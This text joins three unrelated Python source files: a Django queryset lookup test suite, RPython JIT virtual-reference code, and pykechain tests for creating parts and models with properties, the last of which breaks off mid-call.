takes a list of IDs and returns a dictionary mapping IDs to objects. arts = Article.objects.in_bulk([self.a1.id, self.a2.id]) self.assertEqual(arts[self.a1.id], self.a1) self.assertEqual(arts[self.a2.id], self.a2) self.assertEqual(Article.objects.in_bulk([self.a3.id]), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk(set([self.a3.id])), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk(frozenset([self.a3.id])), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk((self.a3.id,)), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk([1000]), {}) self.assertEqual(Article.objects.in_bulk([]), {}) self.assertEqual(Article.objects.in_bulk(iter([self.a1.id])), {self.a1.id: self.a1}) self.assertEqual(Article.objects.in_bulk(iter([])), {}) self.assertRaises(TypeError, Article.objects.in_bulk) self.assertRaises(TypeError, Article.objects.in_bulk, headline__startswith='Blah') def test_values(self): # values() returns a list of dictionaries instead of object instances -- # and you can specify which fields you want to retrieve. identity = lambda x: x self.assertQuerysetEqual(Article.objects.values('headline'), [ {'headline': 'Article 5'}, {'headline': 'Article 6'}, {'headline': 'Article 4'}, {'headline': 'Article 2'}, {'headline': 'Article 3'}, {'headline': 'Article 7'}, {'headline': 'Article 1'}, ], transform=identity) self.assertQuerysetEqual( Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).values('id'), [{'id': self.a2.id}, {'id': self.a3.id}, {'id': self.a7.id}], transform=identity) self.assertQuerysetEqual(Article.objects.values('id', 'headline'), [ {'id': self.a5.id, 'headline': 'Article 5'}, {'id': self.a6.id, 'headline': 'Article 6'}, {'id': self.a4.id, 'headline': 'Article 4'}, {'id': self.a2.id, 'headline': 'Article 2'}, {'id': self.a3.id, 'headline': 'Article 3'}, {'id': self.a7.id, 'headline': 'Article 7'}, {'id': self.a1.id, 'headline': 'Article 1'}, ], transform=identity) # You can use values() with iterator() for memory savings, # because iterator() uses database-level iteration. self.assertQuerysetEqual(Article.objects.values('id', 'headline').iterator(), [ {'headline': 'Article 5', 'id': self.a5.id}, {'headline': 'Article 6', 'id': self.a6.id}, {'headline': 'Article 4', 'id': self.a4.id}, {'headline': 'Article 2', 'id': self.a2.id}, {'headline': 'Article 3', 'id': self.a3.id}, {'headline': 'Article 7', 'id': self.a7.id}, {'headline': 'Article 1', 'id': self.a1.id}, ], transform=identity) # The values() method works with "extra" fields specified in extra(select). self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id + 1'}).values('id', 'id_plus_one'), [ {'id': self.a5.id, 'id_plus_one': self.a5.id + 1}, {'id': self.a6.id, 'id_plus_one': self.a6.id + 1}, {'id': self.a4.id, 'id_plus_one': self.a4.id + 1}, {'id': self.a2.id, 'id_plus_one': self.a2.id + 1}, {'id': self.a3.id, 'id_plus_one': self.a3.id + 1}, {'id': self.a7.id, 'id_plus_one': self.a7.id + 1}, {'id': self.a1.id, 'id_plus_one': self.a1.id + 1}, ], transform=identity) data = { 'id_plus_one': 'id+1', 'id_plus_two': 'id+2', 'id_plus_three': 'id+3', 'id_plus_four': 'id+4', 'id_plus_five': 'id+5', 'id_plus_six': 'id+6', 'id_plus_seven': 'id+7', 'id_plus_eight': 'id+8', } self.assertQuerysetEqual( Article.objects.filter(id=self.a1.id).extra(select=data).values(*data.keys()), [{ 'id_plus_one': self.a1.id + 1, 'id_plus_two': self.a1.id + 2, 'id_plus_three': self.a1.id + 3, 'id_plus_four': self.a1.id + 4, 'id_plus_five': self.a1.id + 5, 'id_plus_six': self.a1.id + 6, 'id_plus_seven': self.a1.id + 7, 'id_plus_eight': self.a1.id + 8, }], transform=identity) # You can specify fields from forward and reverse relations, just like filter(). self.assertQuerysetEqual( Article.objects.values('headline', 'author__name'), [ {'headline': self.a5.headline, 'author__name': self.au2.name}, {'headline': self.a6.headline, 'author__name': self.au2.name}, {'headline': self.a4.headline, 'author__name': self.au1.name}, {'headline': self.a2.headline, 'author__name': self.au1.name}, {'headline': self.a3.headline, 'author__name': self.au1.name}, {'headline': self.a7.headline, 'author__name': self.au2.name}, {'headline': self.a1.headline, 'author__name': self.au1.name}, ], transform=identity) self.assertQuerysetEqual( Author.objects.values('name', 'article__headline').order_by('name', 'article__headline'), [ {'name': self.au1.name, 'article__headline': self.a1.headline}, {'name': self.au1.name, 'article__headline': self.a2.headline}, {'name': self.au1.name, 'article__headline': self.a3.headline}, {'name': self.au1.name, 'article__headline': self.a4.headline}, {'name': self.au2.name, 'article__headline': self.a5.headline}, {'name': self.au2.name, 'article__headline': self.a6.headline}, {'name': self.au2.name, 'article__headline': self.a7.headline}, ], transform=identity) self.assertQuerysetEqual( Author.objects.values('name', 'article__headline', 'article__tag__name').order_by('name', 'article__headline', 'article__tag__name'), [ {'name': self.au1.name, 'article__headline': self.a1.headline, 'article__tag__name': self.t1.name}, {'name': self.au1.name, 'article__headline': self.a2.headline, 'article__tag__name': self.t1.name}, {'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t1.name}, {'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t2.name}, {'name': self.au1.name, 'article__headline': self.a4.headline, 'article__tag__name': self.t2.name}, {'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t2.name}, {'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t3.name}, {'name': self.au2.name, 'article__headline': self.a6.headline, 'article__tag__name': self.t3.name}, {'name': self.au2.name, 'article__headline': self.a7.headline, 'article__tag__name': self.t3.name}, ], transform=identity) # However, an exception FieldDoesNotExist will be thrown if you specify # a non-existent field name in values() (a field that is neither in the # model nor in extra(select)). self.assertRaises(FieldError, Article.objects.extra(select={'id_plus_one': 'id + 1'}).values, 'id', 'id_plus_two') # If you don't specify field names to values(), all are returned. self.assertQuerysetEqual(Article.objects.filter(id=self.a5.id).values(), [{ 'id': self.a5.id, 'author_id': self.au2.id, 'headline': 'Article 5', 'pub_date': datetime(2005, 8, 1, 9, 0) }], transform=identity) def test_values_list(self): # values_list() is similar to values(), except that the results are # returned as a list of tuples, rather than a list of dictionaries. # Within each tuple, the order of the elements is the same as the order # of fields in the values_list() call. identity = lambda x: x self.assertQuerysetEqual(Article.objects.values_list('headline'), [ ('Article 5',), ('Article 6',), ('Article 4',), ('Article 2',), ('Article 3',), ('Article 7',), ('Article 1',), ], transform=identity) self.assertQuerysetEqual(Article.objects.values_list('id').order_by('id'), [(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)], transform=identity) self.assertQuerysetEqual( Article.objects.values_list('id', flat=True).order_by('id'), [self.a1.id, self.a2.id, self.a3.id, self.a4.id, self.a5.id, self.a6.id, self.a7.id], transform=identity) self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id+1'}) .order_by('id').values_list('id'), [(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)], transform=identity) self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id+1'}) .order_by('id').values_list('id_plus_one', 'id'), [ (self.a1.id + 1, self.a1.id), (self.a2.id + 1, self.a2.id), (self.a3.id + 1, self.a3.id), (self.a4.id + 1, self.a4.id), (self.a5.id + 1, self.a5.id), (self.a6.id + 1, self.a6.id), (self.a7.id + 1, self.a7.id) ], transform=identity) self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id+1'}) .order_by('id').values_list('id', 'id_plus_one'), [ (self.a1.id, self.a1.id + 1), (self.a2.id, self.a2.id + 1), (self.a3.id, self.a3.id + 1), (self.a4.id, self.a4.id + 1), (self.a5.id, self.a5.id + 1), (self.a6.id, self.a6.id + 1), (self.a7.id, self.a7.id + 1) ], transform=identity) self.assertQuerysetEqual( Author.objects.values_list('name', 'article__headline', 'article__tag__name').order_by('name', 'article__headline', 'article__tag__name'), [ (self.au1.name, self.a1.headline, self.t1.name), (self.au1.name, self.a2.headline, self.t1.name), (self.au1.name, self.a3.headline, self.t1.name), (self.au1.name, self.a3.headline, self.t2.name), (self.au1.name, self.a4.headline, self.t2.name), (self.au2.name, self.a5.headline, self.t2.name), (self.au2.name, self.a5.headline, self.t3.name), (self.au2.name, self.a6.headline, self.t3.name), (self.au2.name, self.a7.headline, self.t3.name), ], transform=identity) self.assertRaises(TypeError, Article.objects.values_list, 'id', 'headline', flat=True) def test_get_next_previous_by(self): # Every DateField and DateTimeField creates get_next_by_FOO() and # get_previous_by_FOO() methods. In the case of identical date values, # these methods will use the ID as a fallback check. This guarantees # that no records are skipped or duplicated. self.assertEqual(repr(self.a1.get_next_by_pub_date()), '<Article: Article 2>') self.assertEqual(repr(self.a2.get_next_by_pub_date()), '<Article: Article 3>') self.assertEqual(repr(self.a2.get_next_by_pub_date(headline__endswith='6')), '<Article: Article 6>') self.assertEqual(repr(self.a3.get_next_by_pub_date()), '<Article: Article 7>') self.assertEqual(repr(self.a4.get_next_by_pub_date()), '<Article: Article 6>') self.assertRaises(Article.DoesNotExist, self.a5.get_next_by_pub_date) self.assertEqual(repr(self.a6.get_next_by_pub_date()), '<Article: Article 5>') self.assertEqual(repr(self.a7.get_next_by_pub_date()), '<Article: Article 4>') self.assertEqual(repr(self.a7.get_previous_by_pub_date()), '<Article: Article 3>') self.assertEqual(repr(self.a6.get_previous_by_pub_date()), '<Article: Article 4>') self.assertEqual(repr(self.a5.get_previous_by_pub_date()), '<Article: Article 6>') self.assertEqual(repr(self.a4.get_previous_by_pub_date()), '<Article: Article 7>') self.assertEqual(repr(self.a3.get_previous_by_pub_date()), '<Article: Article 2>') self.assertEqual(repr(self.a2.get_previous_by_pub_date()), '<Article: Article 1>') def test_escaping(self): # Underscores, percent signs and backslashes have special meaning in the # underlying SQL code, but Django handles the quoting of them automatically. a8 = Article(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20)) a8.save() self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article'), [ '<Article: Article_ with underscore>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article_'), ['<Article: Article_ with underscore>']) a9 = Article(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21)) a9.save() self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article'), [ '<Article: Article% with percent sign>', '<Article: Article_ with underscore>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article%'), ['<Article: Article% with percent sign>']) a10 = Article(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22)) a10.save() self.assertQuerysetEqual(Article.objects.filter(headline__contains='\\'), ['<Article: Article with \ backslash>']) def test_exclude(self): Article.objects.create(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20)) Article.objects.create(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21)) Article.objects.create(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22)) # exclude() is the opposite of filter() when doing lookups: self.assertQuerysetEqual( Article.objects.filter(headline__contains='Article').exclude(headline__contains='with'), [ '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.exclude(headline__startswith="Article_"), [ '<Article: Article with \\ backslash>', '<Article: Article% with percent sign>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.exclude(headline="Article 7"), [ '<Article: Article with \\ backslash>', '<Article: Article% with percent sign>', '<Article: Article_ with underscore>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 1>', ]) def test_none(self): # none() returns a QuerySet that behaves like any other QuerySet object self.assertQuerysetEqual(Article.objects.none(), []) self.assertQuerysetEqual( Article.objects.none().filter(headline__startswith='Article'), []) self.assertQuerysetEqual( Article.objects.filter(headline__startswith='Article').none(), []) self.assertEqual(Article.objects.none().count(), 0) self.assertEqual( Article.objects.none().update(headline="This should not take effect"), 0) self.assertQuerysetEqual( [article for article in Article.objects.none().iterator()], []) def test_in(self): # using __in with an empty list should return an empty query set self.assertQuerysetEqual(Article.objects.filter(id__in=[]), []) self.assertQuerysetEqual(Article.objects.exclude(id__in=[]), [ '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) def test_error_messages(self): # Programming errors are pointed out with nice error messages try: Article.objects.filter(pub_date_year='2005').count() self.fail('FieldError not raised') except FieldError as ex: self.assertEqual(str(ex), "Cannot resolve keyword 'pub_date_year' " "into field. Choices are: author, author_id, headline, " "id, pub_date, tag") try: Article.objects.filter(headline__starts='Article') self.fail('FieldError not raised') except FieldError as ex: self.assertEqual( str(ex), "Unsupported lookup 'starts' for CharField " "or join on the field not permitted.") def test_regex(self): # Create some articles with a bit more interesting headlines for testing field lookups: for a in Article.objects.all(): a.delete() now = datetime.now() a1 = Article(pub_date=now, headline='f') a1.save() a2 = Article(pub_date=now, headline='fo') a2.save() a3 = Article(pub_date=now, headline='foo') a3.save() a4 = Article(pub_date=now, headline='fooo') a4.save() a5 = Article(pub_date=now, headline='hey-Foo') a5.save() a6 = Article(pub_date=now, headline='bar') a6.save() a7 = Article(pub_date=now, headline='AbBa') a7.save() a8 = Article(pub_date=now, headline='baz') a8.save() a9 = Article(pub_date=now, headline='baxZ') a9.save() # zero-or-more self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'fo*'), ['<Article: f>', '<Article: fo>', '<Article: foo>', '<Article: fooo>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'fo*'), [ '<Article: f>', '<Article: fo>', '<Article: foo>', '<Article: fooo>', '<Article: hey-Foo>', ]) # one-or-more self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'fo+'), ['<Article: fo>', '<Article: foo>', '<Article: fooo>']) # wildcard self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'fooo?'), ['<Article: foo>', '<Article: fooo>']) # leading anchor self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'^b'), ['<Article: bar>', '<Article: baxZ>', '<Article: baz>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'^a'), ['<Article: AbBa>']) # trailing anchor self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'z$'), ['<Article: baz>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'z$'), ['<Article: baxZ>', '<Article: baz>']) # character sets self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'ba[rz]'), ['<Article: bar>', '<Article: baz>']) self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'ba.[RxZ]'), ['<Article: baxZ>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'ba[RxZ]'), ['<Article: bar>', '<Article: baxZ>', '<Article: baz>']) # and more articles: a10 = Article(pub_date=now, headline='foobar') a10.save() a11 = Article(pub_date=now, headline='foobaz') a11.save() a12 = Article(pub_date=now, headline='ooF') a12.save() a13 = Article(pub_date=now, headline='foobarbaz') a13.save() a14 = Article(pub_date=now, headline='zoocarfaz') a14.save() a15 = Article(pub_date=now, headline='barfoobaz') a15.save() a16 = Article(pub_date=now, headline='bazbaRFOO') a16.save() # alternation self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'oo(f|b)'), [ '<Article: barfoobaz>', '<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'oo(f|b)'), [ '<Article: barfoobaz>', '<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>', '<Article: ooF>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'^foo(f|b)'), ['<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>']) # greedy matching self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'b.*az'), [ '<Article: barfoobaz>', '<Article: baz>', '<Article: bazbaRFOO>', '<Article: foobarbaz>', '<Article: foobaz>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'b.*ar'), [ '<Article: bar>', '<Article: barfoobaz>', '<Article: bazbaRFOO>', '<Article: foobar>', '<Article: foobarbaz>', ]) @skipUnlessDBFeature('supports_regex_backreferencing') def test_regex_backreferencing(self): # grouping and backreferences now = datetime.now() a10 = Article(pub_date=now, headline='foobar') a10.save() a11 = Article(pub_date=now, headline='foobaz') a11.save() a12 = Article(pub_date=now, headline='ooF') a12.save() a13 = Article(pub_date=now, headline='foobarbaz') a13.save() a14 = Article(pub_date=now, headline='zoocarfaz') a14.save() a15 = Article(pub_date=now, headline='barfoobaz') a15.save() a16 = Article(pub_date=now, headline='bazbaRFOO') a16.save() self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'b(.).*b\1'), ['<Article: barfoobaz>', '<Article: bazbaRFOO>', '<Article: foobarbaz>']) def test_regex_null(self): """ Ensure that a regex lookup does not fail on null/None values """ Season.objects.create(year=2012, gt=None) self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^$'), []) def test_regex_non_string(self): """ Ensure that a regex lookup does not fail on non-string fields """ Season.objects.create(year=2013, gt=444) self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^444$'), ['<Season: 2013>']) def test_regex_non_ascii(self): """ Ensure that a regex lookup does not trip on non-ASCII characters. """ Player.objects.create(name='\u2660') Player.objects.get(name__regex='\u2660') def test_nonfield_lookups(self): """ Ensure that a lookup query containing non-fields raises the proper exception. """ with self.assertRaises(FieldError): Article.objects.filter(headline__blahblah=99) with self.assertRaises(FieldError): Article.objects.filter(headline__blahblah__exact=99) with self.assertRaises(FieldError): Article.objects.filter(blahblah=99) def test_lookup_collision(self): """ Ensure that genuine field names don't collide with built-in lookup types ('year', 'gt', 'range', 'in' etc.). Refs #11670. """ # Here we're using 'gt' as a code number for the year, e.g. 111=>2009. season_2009 = Season.objects.create(year=2009, gt=111) season_2009.games.create(home="Houston Astros", away="St. Louis Cardinals") season_2010 = Season.objects.create(year=2010, gt=222) season_2010.games.create(home="Houston Astros", away="Chicago Cubs") season_2010.games.create(home="Houston Astros", away="Milwaukee Brewers") season_2010.games.create(home="Houston Astros", away="St. Louis Cardinals") season_2011 = Season.objects.create(year=2011, gt=333) season_2011.games.create(home="Houston Astros", away="St. Louis Cardinals") season_2011.games.create(home="Houston Astros", away="Milwaukee Brewers") hunter_pence = Player.objects.create(name="Hunter Pence") hunter_pence.games = Game.objects.filter(season__year__in=[2009, 2010]) pudge = Player.objects.create(name="Ivan Rodriquez") pudge.games = Game.objects.filter(season__year=2009) pedro_feliz = Player.objects.create(name="Pedro Feliz") pedro_feliz.games = Game.objects.filter(season__year__in=[2011]) johnson = Player.objects.create(name="Johnson") johnson.games = Game.objects.filter(season__year__in=[2011]) # Games in 2010 self.assertEqual(Game.objects.filter(season__year=2010).count(), 3) self.assertEqual(Game.objects.filter(season__year__exact=2010).count(), 3) self.assertEqual(Game.objects.filter(season__gt=222).count(), 3) self.assertEqual(Game.objects.filter(season__gt__exact=222).count(), 3) # Games in 2011 self.assertEqual(Game.objects.filter(season__year=2011).count(), 2) self.assertEqual(Game.objects.filter(season__year__exact=2011).count(), 2) self.assertEqual(Game.objects.filter(season__gt=333).count(), 2) self.assertEqual(Game.objects.filter(season__gt__exact=333).count(), 2) self.assertEqual(Game.objects.filter(season__year__gt=2010).count(), 2) self.assertEqual(Game.objects.filter(season__gt__gt=222).count(), 2) # Games played in 2010 and 2011 self.assertEqual(Game.objects.filter(season__year__in=[2010, 2011]).count(), 5) self.assertEqual(Game.objects.filter(season__year__gt=2009).count(), 5) self.assertEqual(Game.objects.filter(season__gt__in=[222, 333]).count(), 5) self.assertEqual(Game.objects.filter(season__gt__gt=111).count(), 5) # Players who played in 2009 self.assertEqual(Player.objects.filter(games__season__year=2009).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__year__exact=2009).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt=111).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt__exact=111).distinct().count(), 2) # Players who played in 2010 self.assertEqual(Player.objects.filter(games__season__year=2010).distinct().count(), 1) self.assertEqual(Player.objects.filter(games__season__year__exact=2010).distinct().count(), 1) self.assertEqual(Player.objects.filter(games__season__gt=222).distinct().count(), 1) self.assertEqual(Player.objects.filter(games__season__gt__exact=222).distinct().count(), 1) # Players who played in 2011 self.assertEqual(Player.objects.filter(games__season__year=2011).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__year__exact=2011).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt=333).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__year__gt=2010).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt__gt=222).distinct().count(), 2)
the-stack_106_24397
from rpython.rtyper.rmodel import inputconst, log from rpython.rtyper.lltypesystem import lltype, llmemory, rclass from rpython.jit.metainterp import history from rpython.jit.codewriter import heaptracker from rpython.rlib.jit import InvalidVirtualRef class VirtualRefInfo: def __init__(self, warmrunnerdesc): self.warmrunnerdesc = warmrunnerdesc self.cpu = warmrunnerdesc.cpu # we make the low-level type of an RPython class directly self.JIT_VIRTUAL_REF = lltype.GcStruct('JitVirtualRef', ('super', rclass.OBJECT), ('virtual_token', lltype.Signed), ('forced', rclass.OBJECTPTR)) self.jit_virtual_ref_vtable = lltype.malloc(rclass.OBJECT_VTABLE, zero=True, flavor='raw', immortal=True) self.jit_virtual_ref_vtable.name = rclass.alloc_array_name( 'jit_virtual_ref') # build some constants adr = llmemory.cast_ptr_to_adr(self.jit_virtual_ref_vtable) adr = heaptracker.adr2int(adr) self.jit_virtual_ref_const_class = history.ConstInt(adr) fielddescrof = self.cpu.fielddescrof self.descr_virtual_token = fielddescrof(self.JIT_VIRTUAL_REF, 'virtual_token') self.descr_forced = fielddescrof(self.JIT_VIRTUAL_REF, 'forced') # # record the type JIT_VIRTUAL_REF explicitly in the rtyper, too if hasattr(self.warmrunnerdesc, 'rtyper'): # <-- for tests self.warmrunnerdesc.rtyper.set_type_for_typeptr( self.jit_virtual_ref_vtable, self.JIT_VIRTUAL_REF) def _freeze_(self): return True def replace_force_virtual_with_call(self, graphs): # similar to rvirtualizable2.replace_force_virtualizable_with_call(). c_force_virtual_ptr = None c_is_virtual_ptr = None force_virtual_count = 0 for graph in graphs: for block in graph.iterblocks(): for op in block.operations: if op.opname == 'jit_force_virtual': # first compute c_funcptr, but only if there is any # 'jit_force_virtual' around if c_force_virtual_ptr is None: c_force_virtual_ptr = self.get_force_virtual_fnptr() # op.opname = 'direct_call' op.args = [c_force_virtual_ptr, op.args[0]] force_virtual_count += 1 # if op.opname == 'jit_is_virtual': if c_is_virtual_ptr is None: c_is_virtual_ptr = self.get_is_virtual_fnptr() # op.opname = 'direct_call' op.args = [c_is_virtual_ptr, op.args[0]] # if c_force_virtual_ptr is not None: log("replaced %d 'jit_force_virtual' with %r" % (force_virtual_count, c_force_virtual_ptr.value)) # ____________________________________________________________ # The 'virtual_token' field has the same meaning as the 'vable_token' field # of a virtualizable. It is equal to: # * -3 (TOKEN_NONE) when tracing, except as described below; # * -1 (TOKEN_TRACING_RESCALL) during tracing when we do a residual call; # * addr in the CPU stack (set by FORCE_TOKEN) when running the assembler; # * -3 (TOKEN_NONE) after the virtual is forced, if it is forced at all. TOKEN_NONE = -3 TOKEN_TRACING_RESCALL = -1 def virtual_ref_during_tracing(self, real_object): assert real_object vref = lltype.malloc(self.JIT_VIRTUAL_REF) p = lltype.cast_pointer(rclass.OBJECTPTR, vref) p.typeptr = self.jit_virtual_ref_vtable vref.virtual_token = self.TOKEN_NONE vref.forced = lltype.cast_opaque_ptr(rclass.OBJECTPTR, real_object) return lltype.cast_opaque_ptr(llmemory.GCREF, vref) def is_virtual_ref(self, gcref): if not gcref: return False inst = lltype.cast_opaque_ptr(rclass.OBJECTPTR, gcref) return inst.typeptr == self.jit_virtual_ref_vtable def tracing_before_residual_call(self, gcref): if not self.is_virtual_ref(gcref): return vref = lltype.cast_opaque_ptr(lltype.Ptr(self.JIT_VIRTUAL_REF), gcref) assert vref.virtual_token == self.TOKEN_NONE vref.virtual_token = self.TOKEN_TRACING_RESCALL def tracing_after_residual_call(self, gcref): if not self.is_virtual_ref(gcref): return False vref = lltype.cast_opaque_ptr(lltype.Ptr(self.JIT_VIRTUAL_REF), gcref) assert vref.forced if vref.virtual_token != self.TOKEN_NONE: # not modified by the residual call; assert that it is still # set to TOKEN_TRACING_RESCALL and clear it. assert vref.virtual_token == self.TOKEN_TRACING_RESCALL vref.virtual_token = self.TOKEN_NONE return False else: # marker "modified during residual call" set. return True def continue_tracing(self, gcref, real_object): if not self.is_virtual_ref(gcref): return assert real_object vref = lltype.cast_opaque_ptr(lltype.Ptr(self.JIT_VIRTUAL_REF), gcref) assert vref.virtual_token != self.TOKEN_TRACING_RESCALL vref.virtual_token = self.TOKEN_NONE vref.forced = lltype.cast_opaque_ptr(rclass.OBJECTPTR, real_object) # ____________________________________________________________ def get_force_virtual_fnptr(self): # def force_virtual_if_necessary(inst): if not inst or inst.typeptr != self.jit_virtual_ref_vtable: return inst # common, fast case return self.force_virtual(inst) # FUNC = lltype.FuncType([rclass.OBJECTPTR], rclass.OBJECTPTR) funcptr = self.warmrunnerdesc.helper_func( lltype.Ptr(FUNC), force_virtual_if_necessary) return inputconst(lltype.typeOf(funcptr), funcptr) def get_is_virtual_fnptr(self): # def is_virtual(inst): if not inst: return False return inst.typeptr == self.jit_virtual_ref_vtable # FUNC = lltype.FuncType([rclass.OBJECTPTR], lltype.Bool) funcptr = self.warmrunnerdesc.helper_func(lltype.Ptr(FUNC), is_virtual) return inputconst(lltype.typeOf(funcptr), funcptr) def force_virtual(self, inst): vref = lltype.cast_pointer(lltype.Ptr(self.JIT_VIRTUAL_REF), inst) token = vref.virtual_token if token != self.TOKEN_NONE: if token == self.TOKEN_TRACING_RESCALL: # The "virtual" is not a virtual at all during tracing. # We only need to reset virtual_token to TOKEN_NONE # as a marker for the tracing, to tell it that this # "virtual" escapes. assert vref.forced vref.virtual_token = self.TOKEN_NONE else: assert not vref.forced from rpython.jit.metainterp.compile import ResumeGuardForcedDescr ResumeGuardForcedDescr.force_now(self.cpu, token) assert vref.virtual_token == self.TOKEN_NONE assert vref.forced elif not vref.forced: # token == TOKEN_NONE and the vref was not forced: it's invalid raise InvalidVirtualRef return vref.forced
the-stack_106_24398
from pykechain.enums import PropertyType, Multiplicity from pykechain.exceptions import IllegalArgumentError from pykechain.models import Part from pykechain.models.validators import RequiredFieldValidator from pykechain.utils import is_uuid from tests.classes import TestBetamax class TestPartCreateWithProperties(TestBetamax): def setUp(self): super().setUp() self.parent = self.project.part('Bike') # type: Part self.wheel_model = self.project.model('Wheel') # type: Part self.new_wheel = None def tearDown(self): if self.new_wheel: self.new_wheel.delete() super().tearDown() def test_create_part_with_properties_no_bulk(self): """Test create a part with the properties when bulk = False for old API compatibility""" update_dict = { 'Diameter': 42.42, 'Spokes': 42, 'Rim Material': 'Unobtanium' } self.new_wheel = self.parent.add_with_properties( self.wheel_model, "Fresh Wheel", update_dict=update_dict, bulk=False, ) self.assertIsInstance(self.new_wheel, Part) self.assertTrue(self.new_wheel.property('Diameter'), 42.42) def test_create_part_with_properties_names_with_bulk(self): """Test create a part with the properties when bulk = False for old API compatibility""" update_dict = { 'Diameter': 42.43, 'Spokes': 42, 'Rim Material': 'Unobtanium' } self.new_wheel = self.parent.add_with_properties( self.wheel_model, "Fresh Wheel", update_dict=update_dict, bulk=True, ) self.assertIsInstance(self.new_wheel, Part) self.assertTrue(self.new_wheel.property('Diameter'), 42.43) def test_create_part_with_properties_ids_with_bulk(self): """Test create a part with the properties when bulk = False for old API compatibility""" update_dict = { self.wheel_model.property('Diameter').id: 42.43, self.wheel_model.property('Spokes').id: 42, self.wheel_model.property('Rim Material').id: 'Unobtanium' } # check if the keys are really a UUID self.assertTrue(any([is_uuid(key) for key in update_dict.keys()])) self.new_wheel = self.parent.add_with_properties( self.wheel_model, "Fresh Wheel", update_dict=update_dict, bulk=True, ) self.assertIsInstance(self.new_wheel, Part) self.assertTrue(self.new_wheel.property('Diameter'), 42.43) class TestCreateModelWithProperties(TestBetamax): properties_fvalues = [ {"name": "char prop", "property_type": PropertyType.CHAR_VALUE}, {"name": "number prop", "property_type": PropertyType.FLOAT_VALUE, "value": 3.14}, {"name": "boolean_prop", "property_type": PropertyType.BOOLEAN_VALUE, "value": False, "value_options": {"validators": [RequiredFieldValidator().as_json()]}} ] def setUp(self): super().setUp() self.new_part = None def tearDown(self): if self.new_part is not None: self.new_part.delete() super().tearDown() def test_create_model_with_properties(self): parent = self.project.model(name__startswith='Catalog') new_model = self.project.create_model_with_properties( name='A new model', parent=parent.id, multiplicity=Multiplicity.ZERO_MANY, properties_fvalues=self.properties_fvalues, ) self.new_part = new_model self.assertEqual(3, len(new_model.properties)) self.assertEqual(new_model.property('number prop').value, 3.14) self.assertEqual(new_model.property('boolean_prop').value, False) self.assertTrue(new_model.property('boolean_prop')._options) def test_create_with_invalid_properties(self): parent = self.project.model(name__startswith='Catalog') with self.assertRaises(IllegalArgumentError): self.new_part = self.project.create_model_with_properties( name='A new model', parent=parent.id, 